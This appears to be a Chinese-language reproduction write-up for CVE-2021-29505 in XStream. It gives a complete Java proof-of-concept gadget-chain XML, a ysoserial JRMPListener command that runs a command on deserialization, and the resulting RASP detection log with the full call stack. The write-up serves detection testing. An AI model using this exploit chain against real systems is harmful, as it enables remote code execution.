# CVE-2021-29505
# 漏洞环境
maven 依赖
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.16</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>
1
2
3
4
5
6
7
8
9
10
2
3
4
5
6
7
8
9
10
代码
public class CVE_2021_29505 {
public static void main(String[] args) {
String pocXml = "<java.util.PriorityQueue serialization='custom'>\n" +
" <unserializable-parents/>\n" +
" <java.util.PriorityQueue>\n" +
" <default>\n" +
" <size>2</size>\n" +
" </default>\n" +
" <int>3</int>\n" +
" <javax.naming.ldap.Rdn_-RdnEntry>\n" +
" <type>12345</type>\n" +
" <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n" +
" <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>\n" +
" </value>\n" +
" </javax.naming.ldap.Rdn_-RdnEntry>\n" +
" <javax.naming.ldap.Rdn_-RdnEntry>\n" +
" <type>12345</type>\n" +
" <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n" +
" <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n" +
" <parsedMessage>true</parsedMessage>\n" +
" <soapVersion>SOAP_11</soapVersion>\n" +
" <bodyParts/>\n" +
" <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n" +
" <attachmentsInitialized>false</attachmentsInitialized>\n" +
" <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>\n" +
" <soapPart/>\n" +
" <mm>\n" +
" <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n" +
" <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n" +
" <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n" +
" <names>\n" +
" <string>aa</string>\n" +
" <string>aa</string>\n" +
" </names>\n" +
" <ctx>\n" +
" <environment/>\n" +
" <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n" +
" <java.rmi.server.RemoteObject>\n" +
" <string>UnicastRef</string>\n" +
" <string>127.0.0.1</string>\n" +
" <int>1096</int>\n" +
" <long>0</long>\n" +
" <int>0</int>\n" +
" <long>0</long>\n" +
" <short>0</short>\n" +
" <boolean>false</boolean>\n" +
" </java.rmi.server.RemoteObject>\n" +
" </registry>\n" +
" <host>127.0.0.1</host>\n" +
" <port>1096</port>\n" +
" </ctx>\n" +
" </candidates>\n" +
" </aliases>\n" +
" </it>\n" +
" </mm>\n" +
" </multiPart>\n" +
" </sm>\n" +
" </message>\n" +
" </value>\n" +
" </javax.naming.ldap.Rdn_-RdnEntry>\n" +
" </java.util.PriorityQueue>\n" +
"</java.util.PriorityQueue>";
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
XStream xStream = new XStream();
xStream.fromXML(pocXml);
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
POC 工具下载
wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
1
# 漏洞复现
1.启动 RMI 服务
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1096 CommonsCollections4 'touch /tmp/cve.txt'
1
2.java 服务配置 rasp-agent
-javaagent:/Users/xxxx/Desktop/rasp/rasp-module/sandbox/lib/sandbox-agent.jar
1
3.启动 java 服务
4.查看 rasp 检测到的攻击日志
{
"cmdarray":[
"touch",
"/tmp/cve.txt"
],
"stackTrace":[
"java.lang.ProcessImpl.start(ProcessImpl.java)",
"java.lang.ProcessBuilder.start(ProcessBuilder.java:1029)",
"java.lang.Runtime.exec(Runtime.java:620)",
"java.lang.Runtime.exec(Runtime.java:450)",
"java.lang.Runtime.exec(Runtime.java:347)",
"ysoserial.Pwner223862586630727.<clinit>(Gadgets.java)",
"sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)",
"sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)",
"sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)",
"java.lang.reflect.Constructor.newInstance(Constructor.java:423)",
"java.lang.Class.newInstance(Class.java:442)",
"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getTransletInstance(TemplatesImpl.java:455)",
"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:486)",
"com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter.<init>(TrAXFilter.java:58)",
"sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)",
"sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)",
"sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)",
"java.lang.reflect.Constructor.newInstance(Constructor.java:423)",
"org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:116)",
"org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:32)",
"org.apache.commons.collections4.functors.ChainedTransformer.transform(ChainedTransformer.java:112)",
"org.apache.commons.collections4.comparators.TransformingComparator.compare(TransformingComparator.java:81)",
"java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:722)",
"java.util.PriorityQueue.siftDown(PriorityQueue.java:688)",
"java.util.PriorityQueue.heapify(PriorityQueue.java:737)",
"java.util.PriorityQueue.readObject(PriorityQueue.java:797)",
"sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)",
"sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)",
"sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)",
"java.lang.reflect.Method.invoke(Method.java:498)",
"java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1158)",
"java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2176)",
"java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2067)",
"java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1571)",
"java.io.ObjectInputStream.access$800(ObjectInputStream.java:214)",
"java.io.ObjectInputStream$GetFieldImpl.readFields(ObjectInputStream.java:2450)",
"java.io.ObjectInputStream.readFields(ObjectInputStream.java:601)",
"javax.management.BadAttributeValueExpException.readObject(BadAttributeValueExpException.java:71)",
"sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)",
"sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)",
"sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)",
"java.lang.reflect.Method.invoke(Method.java:498)",
"java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1158)",
"java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2176)",
"java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2067)",
"java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1571)",
"java.io.ObjectInputStream.readObject(ObjectInputStream.java:431)",
"sun.rmi.transport.StreamRemoteCall.executeCall(StreamRemoteCall.java:252)",
"sun.rmi.server.UnicastRef.invoke(UnicastRef.java:375)",
"sun.rmi.registry.RegistryImpl_Stub.lookup(RegistryImpl_Stub.java:119)",
"com.sun.jndi.rmi.registry.RegistryContext.lookup(RegistryContext.java:132)",
"com.sun.jndi.rmi.registry.BindingEnumeration.next(RegistryContext.java:617)",
"com.sun.jndi.rmi.registry.BindingEnumeration.next(RegistryContext.java:585)",
"com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl.findNextMatch(LazySearchEnumerationImpl.java:145)",
"com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl.hasMore(LazySearchEnumerationImpl.java:101)",
"com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl.hasMoreElements(LazySearchEnumerationImpl.java:106)",
"com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator.findNextCert(KeyStoreResolver.java:136)",
"com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator.hasNext(KeyStoreResolver.java:104)",
"com.sun.xml.internal.org.jvnet.mimepull.MIMEMessage.makeProgress(MIMEMessage.java:180)",
"com.sun.xml.internal.org.jvnet.mimepull.MIMEMessage.parseAll(MIMEMessage.java:167)",
"com.sun.xml.internal.org.jvnet.mimepull.MIMEMessage.getAttachments(MIMEMessage.java:92)",
"com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart.parseAll(MimePullMultipart.java:107)",
"com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart.parse(MimePullMultipart.java:118)",
"com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimeMultipart.getCount(MimeMultipart.java:195)",
"com.sun.xml.internal.messaging.saaj.soap.MessageImpl.initializeAllAttachments(MessageImpl.java:1379)",
"com.sun.xml.internal.messaging.saaj.soap.MessageImpl.getAttachments(MessageImpl.java:819)",
"com.sun.xml.internal.ws.message.saaj.SAAJMessage$SAAJAttachmentSet.<init>(SAAJMessage.java:650)",
"com.sun.xml.internal.ws.message.saaj.SAAJMessage.getAttachments(SAAJMessage.java:178)",
"com.sun.xml.internal.ws.message.saaj.SAAJMessage.copy(SAAJMessage.java:506)",
"com.sun.xml.internal.ws.api.message.MessageWrapper.copy(MessageWrapper.java:217)",
"com.sun.xml.internal.ws.api.message.Packet.toString(Packet.java:1093)",
"com.sun.org.apache.xpath.internal.objects.XString.equals(XString.java:392)",
"javax.naming.ldap.Rdn$RdnEntry.compareTo(Rdn.java:441)",
"javax.naming.ldap.Rdn$RdnEntry.compareTo(Rdn.java:420)",
"java.util.PriorityQueue.siftDownComparable(PriorityQueue.java:704)",
"java.util.PriorityQueue.siftDown(PriorityQueue.java:690)",
"java.util.PriorityQueue.heapify(PriorityQueue.java:737)",
"java.util.PriorityQueue.readObject(PriorityQueue.java:797)",
"sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)",
"sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)",
"sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)",
"java.lang.reflect.Method.invoke(Method.java:498)",
"com.thoughtworks.xstream.core.util.SerializationMembers.callReadObject(SerializationMembers.java:132)",
"com.thoughtworks.xstream.converters.reflection.SerializableConverter.doUnmarshal(SerializableConverter.java:443)",
"com.thoughtworks.xstream.converters.reflection.AbstractReflectionConverter.unmarshal(AbstractReflectionConverter.java:277)",
"com.thoughtworks.xstream.core.TreeUnmarshaller.convert(TreeUnmarshaller.java:72)",
"com.thoughtworks.xstream.core.AbstractReferenceUnmarshaller.convert(AbstractReferenceUnmarshaller.java:72)",
"com.thoughtworks.xstream.core.TreeUnmarshaller.convertAnother(TreeUnmarshaller.java:66)",
"com.thoughtworks.xstream.core.TreeUnmarshaller.convertAnother(TreeUnmarshaller.java:50)",
"com.thoughtworks.xstream.core.TreeUnmarshaller.start(TreeUnmarshaller.java:134)",
"com.thoughtworks.xstream.core.AbstractTreeMarshallingStrategy.unmarshal(AbstractTreeMarshallingStrategy.java:32)",
"com.thoughtworks.xstream.XStream.unmarshal(XStream.java:1429)",
"com.thoughtworks.xstream.XStream.unmarshal(XStream.java:1409)",
"com.thoughtworks.xstream.XStream.fromXML(XStream.java:1294)",
"com.thoughtworks.xstream.XStream.fromXML(XStream.java:1285)",
"com.CVE_2021_29505.main(CVE_2021_29505.java:70)"
]
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
上面的攻击日志分为2部分: 第一部分是执行的命令,第二部分是攻击调用栈,如果是http请求还会记录完整的http报文。
